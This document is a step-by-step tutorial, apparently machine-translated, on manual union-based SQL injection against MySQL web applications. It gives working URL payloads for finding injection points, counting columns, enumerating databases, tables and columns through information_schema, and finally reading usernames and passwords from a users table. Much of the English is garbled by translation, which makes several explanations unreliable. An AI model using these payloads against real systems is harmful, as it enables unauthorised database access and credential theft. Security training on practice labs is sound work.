MySQL Related statements

database() View the current database

user() View the current user

version() Check the database version

information_schema database

schemata Table, which is the table for storing database names

tables Table is used to store all table names

columns A table is a table that stores field names

group_concat() Splicing function

sleep（） sleep

Determine if there is an injection point

There are many ways to judge the injection point , common and -1=-1 There are other types, such as , Stack Injection 、 Boolean injection of blind injection , Temporal injection , There are also some coincidence of error injection and closure ,’（ Single quotation marks ）,” （ Double quotes ） Brackets 、 Some closures such as the percent sign match , There are annotation symbols ,-- perhaps # I have a few examples ：
notes ： A space is required after the parallel bars Prevent injection failure , If the parallel bar annotation doesn't work, use #

The most commonly used injection point judgment statement

?id=1' and -1=-1 -- bbq

Error reporting injection point

?id=1' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #

Let me give two examples , There are many ways to judge the injection point , Like before waf Wait, you need some escape , Manual injection is to verify one by one

Determine how many fields there are

order by It is a sort statement , The principle is roughly that if there are three columns of data in a table , Namely id ,user, pwd These three fields , that order by 1 It will follow id That column of fields is sorted ,order by 2 According to user Field sorting , And so on when order by 4 Because there is no field in the fourth column in the table , If the return is wrong, then we know that this table has three fields , This step is to show the dislocation , That is to put us SQL Where the statement results are displayed

?id=1' order by 6 -- bbq

Show obvious dislocation

When judging the number of fields in the previous step, you know how many columns, that is, the number of fields , Then show the dislocation in order to show the result of the injected statement in the next step
Statement 11,22,33…… It is based on the number of fields judged and id Or other parameters that cannot be queried can show dislocation

?id=-1' union select 11,22,33,44,55 -- bbq 

Be careful ： Obvious dislocation is incomplete or too much , Will lead to no results

Querying the current database

Use the command to show the dislocation , You can see on the page 11,22,33 Equal number , The number displayed on the page is written SQL Statement to inject
version() Check the database version ,database() View the current database

?id=-1' union select version() ,database(),33,44,55 -- bbq

Query all databases ：
If there are many tables, the page display is incomplete , have access to LIMIT Page by page

?id=-1' union select table_schema,22 from information_schema.tables -- bbq

perhaps ：

?id=-1' union select schema_name,22 from information_schema.schemata-- bbq

table_schema The fields are information_schema Database tables In the table Record the of the database Field
schema_name The fields are information_schema Database schemata In the table Record the of the database Field

Query all tables in the database

If there are many tables, the page display is incomplete , have access to LIMIT Page by page , You can also use group_concat() The splicing function wraps the displayed field names for display
Query all tables in the current database ：

?id=-1' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq 

table_name The fields are information_schema Database tables In the table Record database table Field
Sample rough format ：?id=-1’ union select table_name,22,33 from information_schema.tables where table_schema=‘ Database name ’ – bbq

Query the column names in the specified table

The next step to query the table name is , The query field is the column name

Query all fields of the specified database table ：

?id=-1' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq 

column_name The fields are information_schema Database columns In the table Record all table fields Field
table_schema and table_name Field in information_schema Database columns And recorded in the table tables It's the same in the table
Rough template ：?id=-1’ union select column_name,22,33 from information_schema.columns where table_schema=‘ Database name ’ and table_name=‘ Table name ’ – bbq

Query data

After the above steps , Already know the database name 、 Table name 、 Field name , Then we can query the data we need
for example ： Table name is users The required data fields are username,password

?id=-1' union select username,password,33 from users -- bbq

The manual steps are like this , According to the project situation, I need to change the injection method and learn other methods of injection